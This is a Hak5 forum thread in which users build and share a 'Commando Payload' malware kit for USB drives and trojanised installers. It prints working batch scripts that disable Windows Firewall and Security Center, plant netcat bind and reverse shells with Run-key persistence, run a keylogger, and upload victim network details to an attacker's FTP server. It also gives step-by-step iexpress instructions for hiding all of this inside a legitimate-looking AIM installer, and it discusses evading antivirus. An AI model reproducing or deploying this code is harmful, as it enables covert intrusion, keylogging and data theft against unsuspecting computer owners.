USB Commando Payload v3 Beta w/ Java's Method v2

[sablefoxx]

This is in response to this thread: http://forums.hak5.org/index.php/topic,7971.0.html

See Latest Post for v3.0 Beta / Java's Method v2

Current Stable Release 2.2

What it does:

Gives you a reverse shell on a computer, it comes in two flavors my switchblade style attack, and Javabudd's exe bind method.  Both have the same features.

Sable's Method:

Howto Use: 

Infect target computer with payload goto your computer connect to victims computer with a reverse shell :)

nc.exe [host] [port]  To connect use nc.exe from BiN or DL full version here - Netcat

Commando Payload:

[*] U3 / Non U3 Compatable

[*] Copies NC.exe onto computer and runs it on port 69

[*] If autoexec.bat exists it will add itself into it

[*] Completely Stealthed

[*] Automatic Windows Firewall Kill and Security Center Disable

[*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus

[*] Cleaner.bat to remove payload *See below for updated code*

[*] Removes Windows Firewall from Ctrl Panel (requires reboot)

[*] Autoruns at Startup Using a Regkey  - (thx to Javabudd)

[*] Added -t So you can telnet to victim  - (thx to Javabudd)

[*] Ctrl+Alt+Del Resistant                    - (thx to Javabudd)

Upcoming Addons:

[*] Bypass NAT (see Java's Method v2)

[*] U3 Vista Port (coming soon to Cmdo v3)

Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.

  Javabudd's  Method

                    Binds nc.exe and some script to a legit installer (magicISO), so when you run the installer it not only installs magicISO but the payload as well. 

------------------------------------------------------------------------------------------------------------------------------------------------------

Download Commando Payload Here (SiZE:81Kb - File:RAR - NonU3)

Commando Payload 2.2

Download Commando Payload Here (SiZE:151Kb - File:ISO - U3)

Commando Payload 2.2

Download Java's Method Here (SiZE:3Mb - File:EXE - WinXP/Vista)

Java's Method v1.0

================================================================================

===

Feel Free to Add/Mod/Hack this code all you want!

-- MAD Props to javabudd, v2 kicks ass

[Xqtftqx]

Holy Shit, nice dude i did one with netcat last night it just runs it. this is awsome. Mad Props Dude. this is defenly going in my payload.

[sablefoxx]

Ok, updated the payload, should auto disable windows' firewall, kill security center, and add nc.exe to exceptions list incase they turn the firewall back on.

Let me know if there are problems, as i didnt get a good chance to test everything.

Any ideas on howto bypass NAT?

  --Maybe auto join a VPN?

[javabudd]

Ive got a perfect iexpress installer that i made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it.  And im also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run, anything in that key is run on startup with no questions asked and run perfectely stealthed :D

[sablefoxx]

Ive got a perfect iexpress installer that i made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it.  And im also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run, anything in that key is run on startup with no questions asked and run perfectely stealthed :D

Hot! Send me teh code when its done!

[javabudd]

**Edit**

I changed the cabinet installer to put a directory in the windows folder named Attreb. Inside this folder is nc and all that shit the only problem im having right now is adding this key to the registry so it auto runs nc -L -d -p 69 -e cmd.exe. Im using INF files, anyone have any ideas?

[javabudd]

I got this installer perfected.  Heres the  link http://www.mediafire.com/?5i1ljjy9xcj. In the RAR is the fake MagicISO installer and the INF file i made. Read through the INF then you will understand what happens when you execute the installer. Very Happy Very Happy Happy Hacking !

[sablefoxx]

Updated payload to V2, look at above post for details!!

Here is the cleaner.bat code to remove the payload v2.2:

@echo off
cls
taskkill /f /im nc.exe
cd C:WINDOWSsystem32
del /f /q start.bat
del /f /q stop.bat
del /f /q hidec.exe
del /f /q nc.exe
reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v Attreb /f
reg delete "HKCUControl Paneldon't load" /v Firewall.cpl /f
msg * "system clean"
exit

[javabudd]

shout out to sable and his switchblade :D.  If anyone has any ideas on what we should add let us know and we will try and implement them...commando payload v2 = GG

[underhole]

Tested it to day, it works like magic.

Another great payload from Sable

[sablefoxx]

Cmdo Payload v3.0 Development

Current State of Commando Payload 3.0 Beta: [*] U3 / Non U3 Compatable [*] Completely Stealthed [*] Keylogger with Real Time Feed Back (rtk.bat) *New, Works but Buggy* [*] Runs Reverse Shell on Port 69 [*] Easy to Use Connect to Victim Script *New* [*] Automatic Windows Firewall Kill and Security Center Disable *Fixed* [*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus [*] Cleaner.bat to remove payload *Updated for v3.0* [*] Removes Windows Firewall from Ctrl Panel *Fixed* [*] Autoruns at Startup Using a Regkey  *Not Working Need Fix* [*] Commented Code *New* [*] Records IPconfig to txt in Logs dir *New* [*] Won't Run if C:safety.txt exists *New* [*] NAT Traversal, Connect Through Routers *New, Only Works in Java's Method so far* [*] Added -t So you can telnet to victim

--Everything is Almost working but before it gets release as the main payload i would like some people to test it, through me some ideas on other things to add, and review my code and fix it, hehe.

---Codez---

Magik.bat - Script That Installs Payload

:0
@echo off
cls
:: Test for safty.txt
IF EXIST C:safty.txt goto exit
:: Test to see if payload is alrdy installed
IF EXIST C:WINDOWSsystem32nc.exe goto exit
:: Test to see if ther is a logs dir (Non-U3 only)
IF NOT EXIST Logs goto mklog
:1
:: Reg1 = Startup Key
:: Reg2 = Disables Firewall in Ctrl Panel
reg import "reg1.reg"
reg import "reg2.reg"
:: First poke a hole in window's firewall so that it will allow nc.exe
hidec /w stop.bat
:: Move files to location and run
xcopy /y /s .BiN %systemroot%system32
:: Make log (Non-U3 Only)
ipconfig /all>>.Logs%computername%.txt
:: Start Payload
cd C:WINDOWSsystem32
start k.exe
hidec nc.exe -l -t -p 69 -d -e cmd.exe
goto exit
:mklog
mkdir Logs
goto 1
:exit
exit

connect.bat - Easy Way to Connect to Victim, for the people out there who dont know what "nc.exe [host] [port]" means.

:setup
@echo off
cls
title Auto-NConnect
IF NOT EXIST nc.exe goto error
IF NOT EXIST makefile goto error
goto 1
:1
echo.
echo             ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo             º       Welcome to SableFoXx's         º
echo             º           Auto-NConnect              º
echo             ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
set /p target= Input IP of Target: 
echo. 
set /p port= Input Port (defualt 69): 
cls
title Reverse Shell Open
goto connect 
:connect
nc.exe %target% %port%
:error
cls
color c
echo BAD BLAK MAGiC, TRY AGAiN
pause
exit

stop.bat - stops windows firewall and security center

@echo off
cls
net stop "security center"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
exit

Real Time Keylogger View (Still Buggy)

Usage of rtk.bat:
      Connect to host, goto %systemroot%system32 and start rtk.bat, basically displays keylogger's log file and refreshes it.  Working on a .html version that should work better then current one.

rtk.bat:

@echo off
:1
:: clear screen
cls
:: display text in log
type C:WINDOWSsystem32log.txt
:: pause before refresh
REM ******PAUSE******
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% neq 250 goto :pause1
REM *****************
:: repeat/refresh
goto 1

Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.
------------------------------------------------------------------------------------------------------------------------------------------------------
Download Commando Payload Here (SiZE:175Kb - File:RAR - NonU3)
Commando Payload 3.0 - Beta
================================================================================
===
Please Post Code Fixes, New Ideas, and Anything on Your Mind

[javabudd]

HEY sable you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggys to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other progy automatically connects to my ftp (No username or password needed because its already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on aim if u want the code, i cant give it away here cuz it has my ftp info :/ Oh btw, you can scratch get External IP from upcoming additions :D

[javabudd]

Java v2.0

Current Progress on Java Installer Payload v2.0

• [li]Completely Stealthed[/li]

[li]Bound to aim.exe (or any .exe installer you like)[/li]

[li]Reverse shell on port 69[/li]

[li]WORKS EVEN IF VICTIM HAS A ROUTER[/li]

[li]Implements an ipconfig /all > %computername%.txt[/li]

[li]Uploads "%computername%.txt to an FTP server (I am going to include the code but with my FTP info taken out)[/li]

[li]Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)[/li]

[li]WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN[/li]

[li]And last but hopefully not the least, Anti virus does not pickup any of it. :D:D[/li]

Teh Codez

jvabd.bat:

@echo off
:: Executing IPCONFIG and creating .txt
ipconfig /all > c:WindowsSystem32%Computername%.txt
cls
:: Executing Script to send ipaddr to ftp :D
CALL .hidden.vbs script.bat
:: Quitting
GOTO End
:End

hidden.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

script.bat

MAKE SURE YOU EDIT THE NECESSARY FIELDS

@ECHO OFF
:: Create the temporary script file
> script.ftp ECHO USER YOURUSERNAME
>>script.ftp ECHO PASSWORD
>>script.ftp ECHO binary
>>script.ftp ECHO prompt n
>>script.ftp ECHO put "C:WindowsSystem32%computername%.txt"
>>script.ftp ECHO QUIT
::Connect to the ftp and run the script
FTP -v -s:script.ftp FTPSERVER
:: Overwriting the temp script so this never happened :D
TYPE NUL >script.ftp
DEL script.ftp
EXIT

Setup.inf

MAKE SURE YOU EDIT THE NECESSARY FIELDS

; This INF File will install netcat in the TARGET system32 directory and implement the following command
; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address
; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69
; any time you create a listen server on your computer
; Lets Begin:

[Version] 
Signature="$Chicago$"
AdvancedINF=2.0

[DefaultInstall]
Copyfiles=install.files
Copyfiles=installer.files
RunPostSetupCommands=RunPostSetupCommandsSection
AddReg=Add.Settings

[DestinationDirs]
; If you are using a different .exe installer switch the directory HERE
install.files=30,/Windows/System32
installer.files=30,/Program Files/AOL Instant Messenger

[install.files]
; These are the pwnage programs that will be installed into system32

jvabd.bat;ipconfig /all txt creator
script.bat;autoconnect to ftp and upload ipconfig txt :D
nc.exe; netcat of course:
nircmd.exe;hides cmd window 
hidden.vbs; hides cmd window while executing a batch in a batch 
setup.inf;inf file

[installer.files]
; The aim installer that installs into /program files/aol instant messenger;)
; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
aim.exe

[Add.Settings]
; Adding registry key to make nc run on boot :D
; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D

HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"

[RunPostSetupCommandsSection]
; Programs are going to be listed in order of execution, including parameters (nc :D):
; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
; If you have a different .exe installer replace aim.exe with your.exe once again

nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
nircmd.exe execmd CALL jvabd.bat
aim.exe

[SourceDiskNames]
1="default",,1

[br]

Instructions on creating the installer

[br]

Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf its time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Dont worry when you run the compiled version only the installer is shown, everything else gets stealth installed.

Now, when you have these 7 things inside a folder its time to compile them into one. *Note* I have not found a method of doing this on linux or mac yet, being as they dont use .exe's" Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command" Create a package title (i did AIM 5.9.8) )then decide whether or not u want a confirmation message (This will install blah blah, are you sure?) Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer).

Click next, on the next screen under "Install Program" choose SETUP.INF not YOUR.EXE INSTALLER and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check the "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwange :D.

**IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT**

[javabudd]

wow sable im so glad this forum is still up!! I formatted my comp and forgot to backup all this shit but thankfully its here. <3

[Jen]

Can someone give me a more clear explanation in noob terms on what this does?

[Jen]

Hey sablefox, do you still work on this project?

[sablefoxx]

As it just so happens, me and Javabudd recently resumed working on that project;

Nothing to release just yet, but here are a few features of the new version:

-Gui Interface (command line as well)

-Silent install option

-Auto Bypass Router

-Emails External IP/Info

-Customize each install using GUI

-Built in tools (such as wget)

-Option to install FTP server

-Even more

As always when its done I'll post all the source for everyone to play around with. :)

Edited March 3, 2010 by sablefoxx

[Jen]

Wow, looks great!! Any updates on virus undetection? Like making the tool FUD? and u3 too?

[sablefoxx]

Could do a U3 version easily, been mulling over compiling my own version of NetCat to attempt avoiding AV detection, or even possibly coding my own in Python... not sure just yet, all in due time methinks.

[Jen]

Okk, thanks a lot! Will you be finished before April 1st?? Cause i'm going to test things during spring break :P

[sablefoxx]

Okk, thanks a lot! Will you be finished before April 1st?? Cause i'm going to test things during spring break :P

I will see if I can get something together by then, however I regret to inform everyone there has been a slight set back... I have obtained a Starcraft 2 Beta Key... :)

[Jen]

I will see if I can get something together by then, however I regret to inform everyone there has been a slight set back... I have obtained a Starcraft 2 Beta Key... :)

Haha, okay. I understand :)

[X3N]

i been away for a while but i wouldn't mind getting back into developing new and improved switchblades... let me know if theres anything in particular that i can do to help... otherwise ill just start hackin

[thedadymac]

hi I was wondering what i would have to change in the code to allow me to connect to the "victim" over the internet instead of over a LAN

[Jen]

I think it does allow you to connect over internet, as long as they dont' have a router